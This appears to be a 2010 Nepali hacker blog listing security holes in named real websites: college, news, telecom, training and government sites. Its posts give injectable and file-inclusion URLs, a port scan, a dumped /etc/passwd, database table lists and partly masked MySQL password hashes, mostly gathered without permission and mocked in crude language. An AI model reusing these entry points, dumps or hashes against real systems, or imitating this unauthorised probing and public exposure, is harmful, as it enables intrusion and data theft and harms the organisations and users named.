Sunday, 18 July 2010

Informatics college. Directory browsing enabled.

Informatics college situated in Kathmandu promises its student that it will give you some knowledge about network security and all that fucking stuffz. Well the biggest problem is that the fuckers themself dont know about security. Take a look at this:

The following are the details of the server:
hostname:informatics.edu.np
uptime:803209s
last reboot:Thu July 08 9:36:45 2010
ip: 74.54.219.66
hostnames:(name-type)
informatics.edu.np-user
lamborghini.websitewelcome.com-PTR
OS-DD_WRT v23(linux kernel version 2.4.36)(ports used: 21,231)

The details are as follows:

Port

Protocol

State(0-open/x-filtered)

Service/version

7

TCP

X

echo

9

TCP

X

Discard

13

TCP

X

Daytime

21

TCP

0

ftp/PureFTPd

22

TCP

X

Ssh

25

TCP

X

SMTP

26

TCP

0

Smtp/EximSMTPd 469

53

TCP

0

Domain

80

TCP

0

http

110

TCP

0

Pop3/CourierPOP3d

135

TCP

X

Msrpc

139

TCP

X

Netbios-ssn

143

TCP

0

Imap/CourierIMAPd 2006 released

443

TCP

0

445

TCP

X

Microsoft-ds

465

TCP

0

993

TCP

0

Imap/CourierIMAPd2008 released

995

TCP

0

5800

TCP

X

Vnc-http

5900

TCP

x

vnc


also more than that i think that it is vulnerable to the sqli attack

url entered: http://www.informatics.edu.np/about_us.php?inst=asdasdvasdv
returned: ERROR: Unknown column 'asdasdvasdv' in 'where clause'

url entered:http://www.informatics.edu.np/course_matter.php?mid=asdvasdv
returned: Unknown column 'asdvasdv' in 'where clause'

also the college uses the webmail based in zimbra...you can look at milw0rm for the vuls of zimbra( i dont want to tell the which version it is....try this by your own)

Sunday, 25 April 2010

LACM.EDU.NP [little angels college of management] File inclusion vulnerability

I was checking the site of Little Angels College of Management when they were here in KU for the sports week. & in a while, I found it to be vulnerable to file inclusion vulnerability.
Vulnerable URL is:
http://lacm.edu.np/?lacm=[any_file_to_include]


/etc/passwd:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash postfix:x:89:89::/var/spool/postfix:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin shiva:x:500:500::/home/shiva:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin admispconfig:x:501:501:Administrator ISPConfig:/home/admispconfig:/bin/bash

And I also got the sql Db.. what the hell they are keeping database backup in the website root folder itself.
See you guys.

Ekantipur.com [Ekantipur -online news portal of Kantipur Daily] Vulnerability

Most of us know about Ekantipur.com, online news portal of kantipur daily newspaper. They recently came with new design and development & I was hoping to see securely coded website but I was still able to find some holes in the website. There is a SQL injection vuln in the site of kantipur daily which can be used to potentially dump the DB & then the admin panel can be compromised and possibly we can get shell in the site..
I hope they will soon fix it.. & if they want to get the information of the vulnerability, I would be happy to help them.
Database tables in the current DB:
» daily_updates
» ek_categories
» ek_gallary_comments
» ek_gallary_images
» ek_gallery_image_rating
» ek_news
» ek_news_comments
» ek_news_gallary
» ek_news_gallary_details
» ek_news_keywords
» ek_news_keywords_list
» ek_news_ratings
» ek_news_reporter_list
» ek_news_reporters
» ek_photo_features
» ek_photo_gallary
» ek_sub_categories
» ekn_categories
» ekn_gallary_comments
» ekn_gallary_images
» ekn_gallery_image_rating
» ekn_news
» ekn_news_comments
» ekn_news_gallary
» ekn_news_gallary_details
» ekn_news_keywords
» ekn_news_keywords_list
» ekn_news_ratings
» ekn_news_reporter_list
» ekn_news_reporters
» ekn_photo_features
» ekn_photo_gallary
» ekn_photo_gallary_details
» ekn_sub_categories
» exchange_rates
» horoscope
» horoscope_reading
» horroscope
» kan_categories
» kan_gallary_images
» kan_main_photo
» kan_news
» kan_news_author_list
» kan_news_comments
» kan_news_gallary
» kan_news_gallary_details
» kan_news_keywords
» kan_news_keywords_list
» kan_news_ratings
» kan_news_reporter_list
» kan_news_reporters
» kan_photo_features
» kan_photo_gallary
» kan_photo_gallary_details
» kan_sub_categories
» kq_categories
» kq_gallary_images
» kq_issue
» kq_main_photo
» kq_news
» kq_news_author_list
» kq_news_authors
» kq_news_comments
» kq_news_gallary
» kq_news_gallary_details
» kq_news_keywords
» kq_news_keywords_list
» kq_news_ratings
» kq_photo_features
» kq_photo_gallary
» kq_photo_gallary_details
» kq_sub_categories
» login_records
» models
» models_gallery_images
» nar_categories
» nar_gallary_images
» nar_issue
» nar_news
» nar_news_author_list
» nar_news_authors
» nar_news_comments
» nar_news_gallary
» nar_news_gallary_details
» nar_news_keywords
» nar_news_keywords_list
» nar_news_ratings
» nar_photo_features
» nar_photo_gallary
» nar_photo_gallary_details
» nar_sub_categories
» nep_categories
» nep_gallary_images
» nep_issue
» nep_news
» nep_news_author_list
» nep_news_authors
» nep_news_comments
» nep_news_gallary
» nep_news_gallary_details
» nep_news_keywords
» nep_news_keywords_list
» nep_news_ratings
» nep_photo_features
» nep_photo_gallary
» nep_sub_categories
» nepa_year
» nepse_chart
» news_agency
» news_keywords
» news_status
» news_types
» papers
» photo_gallary_details
» poll_option
» poll_ques
» privilege
» ratings
» sap_blow_up
» sap_categories
» sap_gallary_images
» sap_issue
» sap_news
» sap_news_author_list
» sap_news_authors
» sap_news_comments
» sap_news_gallary
» sap_news_gallary_details
» sap_news_keywords
» sap_news_keywords_list
» sap_news_ratings
» sap_photo_features
» sap_photo_gallary
» sap_photo_gallary_details
» sap_sub_categories
» stock_trading_companies
» tithi
» tkp_categories
» tkp_gallary_images
» tkp_main_photo
» tkp_news
» tkp_news_comments
» tkp_news_gallary
» tkp_news_gallary_details
» tkp_news_keywords
» tkp_news_keywords_list
» tkp_news_ratings
» tkp_news_reporter_list
» tkp_news_reporters
» tkp_photo_features
» tkp_photo_gallary
» tkp_photo_gallary_details
» tkp_sub_categories
» user_paper_privileges
» user_type_privileges
» user_types
» users
» video_categories
» videos
» weather_details
» weather_place
» wp_1_comments
» wp_1_links
» wp_1_options
» wp_1_postmeta
» wp_1_posts
» wp_1_term_relationships
» wp_1_term_taxonomy
» wp_1_terms
» wp_blog_versions
» wp_blogs
» wp_registration_log
» wp_signups
» wp_site
» wp_sitecategories
» wp_sitemeta
» wp_usermeta
» wp_users

No other dumps made over here for the reason of security. Hope they will secure it.
Thank you.

NHNepal.com New Horizons Computer Learning Centers Vulnerability

NHNepal.com is the official site of New Horizons Computer Learning Centers in Nepal which is vulnerable to minor injection attack. This vulnerability was reported to us by someone and full credit goes to him/her for finding this.
They state:
With over 300 centers in 70 countries, New Horizons is the world’s largest independent IT training company. Over the past 25 years, New Horizons has delivered a full range of IT training and business skills training through innovative learning methods that have transformed businesses and helped over 25 million students reach their goals.

Anyway, logged in admin panel screenshot from the hacker himself:

Thanks.. Hope they soon secure it or otherwise they will become victim of another pwnage.

Monday, 12 April 2010

Cybersansar vulnerability re-exposed

One of the most visited sites from Nepal, CyberSansar.com is vulnerable to lots of serious injections like SQLi and XSS but today here I'm going to post the SQL injection in the site. I hope they will try to fix the site after reading this post. No offense at all to them. Moreover, the MySQL version is greater than 5 so its easier for the attacker to steal the database information.
User: database => cybernepal3@localhost:cybernepal_3
Tables:
album_detail
album_master
album_person_related
art_gallery
art_gallery_image
art_gallery_path
art_grp_tag_gal
art_tag_gallery
art_tag_photo
art_tags
article_person_related
author
bachelor_user_logon
bc_category_para
bc_final_person_profile
bc_person_profile
bc_photo_folder
bc_profile_list
bc_profile_para
contest_master
contest_question_detail
contest_question_master
cs_birthday_wish
discography
ethnicity_para
ev_gallery
ev_gallery_image
ev_gallery_path
ev_grp_tag_gal
ev_person_related
ev_tag_gallery
ev_tag_photo
ev_tags
event_master
event_para_person_related
event_type
gallery
gallery_image
gallery_path
group_list
grp_tag_gal
job
org_para
org_type
person_persontype
person_taghion
photographer
popular_models
pr_category_para
pr_gallery_image
pr_hion
pr_person_detail
pr_person_profile
pr_persontype
pr_persontype_para
pr_photos
pr_profile_list
pr_profile_para
pr_question_related
pr_subcategory_para
pr_users
profile
profile1
profile_persontype
register_users
section
song_genre_related
song_orginal_singer_related
song_person_related
srw_login
srw_news
tag
tag_article
tag_gallery
tag_list
tag_photo
tags
user_logon
users
users_artist
vdb_music_category
vdb_video_info
vdb_video_info_backup
video_feature_singer_related
video_genre_related
video_orginal_singer_related
video_person_related
wallpaper
wallpaper_gallery 
I'm lazy to dump each column's data lol. Anyway, its just the message to CS how insecure they are.
Hope they fix this soon.

Sunday, 14 March 2010

NTC Great Hack

Hi all of hackers out there.
Can some one tell what the fuck is happening with http://websms.ntc.net/cgi-sys/defaultwebpage.cgi this???

Saturday, 13 March 2010

SpiceNepal.com [mero mobile] Vulnerability

Its been a long time we haven't posted to this blog. Apparently, none of the members seem to be active these days including me. Maybe its because of lots of load works to do and other shits in our life. Anyway, this one is the disclosure of the security of spicenepal.com
I thought to publish it now because spicenepal.com or mero mobile has now turned to NCell already.

This might not be true at present but it is the data when the attack was done.

Host info:
Windows
Apache 2.2.12
PHP 5.3.0
MySQL version: 5.1.37

root: *CD6F0D95CC06845F457474160829CA31EA28A***
eshori: *13CC2012857387DA417378DAE0D32DB4FC729***
Last 3 bits changed for security purpose..

Tables:
PBXT_STATISTICS
bak_banner
bak_bannerclient
bak_bannertrack
bak_categories
bak_components
bak_contact_details
bak_content
bak_content_frontpage
bak_content_rating
bak_core_acl_aro
bak_core_acl_aro_groups
bak_core_acl_aro_map
bak_core_acl_aro_sections
bak_core_acl_groups_aro_map
bak_core_log_items
bak_core_log_searches
bak_groups
bak_menu
bak_menu_types
bak_messages
bak_messages_cfg
bak_migration_backlinks
bak_modules
bak_modules_menu
bak_newsfeeds
bak_plugins
bak_poll_data
bak_poll_date
bak_poll_menu
bak_polls
bak_prbt
bak_sections
bak_session
bak_stats_agents
bak_templates_menu
bak_users
bak_weblinks
jos_banner
jos_bannerclient
......... and much more. I was just too lazy to exploit it.
Anyway that was the disclosure of spicenepal.com. Have fun.

Monday, 4 January 2010

Ministry of forests & soil conservation vulnerability

As usual, another government site is vulnerable to SQL injection and this time, it can be used to mass own the server. I don't know why these fucking guys do such a poor coding. I just don't know who's kid, me or these guys.
Anyway, the MySQL>5 allows me to take all DB details and entities in it. Also, the admin panel is vulnerable to login bypass due to lack of filtration of the data.
Below is the screenshot of the logged panel:






Thank you and hope they fix it...